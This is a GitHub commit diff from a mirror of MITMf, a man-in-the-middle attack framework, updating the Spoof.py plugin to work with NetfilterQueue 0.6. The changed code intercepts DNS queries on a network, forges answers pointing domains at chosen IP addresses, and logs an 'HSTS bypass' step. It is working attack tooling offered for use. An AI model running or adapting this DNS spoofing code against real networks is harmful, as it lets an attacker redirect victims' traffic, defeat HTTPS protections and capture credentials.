github/MITMf
1
0
Fork 0
mirror of https://github.com/byt3bl33d3r/MITMf.git synced 2025-07-16 10:03:52 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions

nfqueue with NetfilterQueue 0.6 now working! \o/

Browse source
This commit is contained in:
byt3bl33d3r 2015-03-10 03:37:07 +01:00
parent 23a273e8a0
commit 4c465b3806
1 changed files with 7 additions and 12 deletions
Download patch file Download diff file Expand all files Collapse all files

19
plugins/Spoof.py
View file

@ -2,14 +2,10 @@
# DNS tampering code stolen from https://github.com/DanMcInerney/dnsspoof # DNS tampering code stolen from https://github.com/DanMcInerney/dnsspoof
# #
#from twisted.internet import reactor
#from twisted.internet.interfaces import IReadDescriptor
from plugins.plugin import Plugin from plugins.plugin import Plugin
from time import sleep from time import sleep
import dns.resolver import dns.resolver
#import socket
from netfilterqueue import NetfilterQueue from netfilterqueue import NetfilterQueue
#import nfqueue
import logging import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
from scapy.all import * from scapy.all import *
@ -381,7 +377,7 @@ class _DNS():
t.start() t.start()
def nfqueue_bind(self): def nfqueue_bind(self):
self.nfqueue.bind(1, self.nfqueue_callback, 5000, 3) self.nfqueue.bind(1, self.nfqueue_callback, 3)
self.nfqueue.run() self.nfqueue.run()
def stop(self): def stop(self):
@ -405,14 +401,11 @@ class _DNS():
logging.info("Error resolving " + domain) logging.info("Error resolving " + domain)
def nfqueue_callback(self, payload): def nfqueue_callback(self, payload):
if payload: pkt = IP(payload.get_payload())
print "got packet!"
data = payload.get_payload()
pkt = IP(data)
if not pkt.haslayer(DNSQR): if not pkt.haslayer(DNSQR):
payload.accept() payload.accept()
else: else:
logging.debug("Got DNS packet for %s %s" % (pkt[DNSQR].qname, pkt[DNSQR].qtype)) logging.info("Got DNS packet for %s %s" % (pkt[DNSQR].qname, pkt[DNSQR].qtype))
if self.dns: if self.dns:
for k, v in self.dnscfg.items(): for k, v in self.dnscfg.items():
if k in pkt[DNSQR].qname: if k in pkt[DNSQR].qname:
@ -446,9 +439,11 @@ class _DNS():
for i in ip: for i in ip:
spoofed_pkt[DNS].an.add_payload(DNSRR(rrname=pkt[DNS].qd.qname, ttl=1800, rdata=i)) spoofed_pkt[DNS].an.add_payload(DNSRR(rrname=pkt[DNS].qd.qname, ttl=1800, rdata=i))
logging.info("%s Resolving %s for HSTS bypass" % (pkt[IP].src, pkt[DNSQR].qname[:-1])) logging.info("%s Resolving %s for HSTS bypass" % (pkt[IP].src, pkt[DNSQR].qname[:-1]))
payload.set_verdict_modified(nfqueue.NF_ACCEPT, str(spoofed_pkt), len(spoofed_pkt)) payload.set_payload(str(spoofed_pkt))
payload.accept()
if self.dns: if self.dns:
spoofed_pkt[DNS].an = DNSRR(rrname=pkt[DNS].qd.qname, ttl=1800, rdata=ip) spoofed_pkt[DNS].an = DNSRR(rrname=pkt[DNS].qd.qname, ttl=1800, rdata=ip)
logging.info("%s Modified DNS packet for %s" % (pkt[IP].src, pkt[DNSQR].qname[:-1])) logging.info("%s Modified DNS packet for %s" % (pkt[IP].src, pkt[DNSQR].qname[:-1]))
payload.set_verdict_modified(nfqueue.NF_ACCEPT, str(spoofed_pkt), len(spoofed_pkt)) payload.set_payload(str(spoofed_pkt))
payload.accept()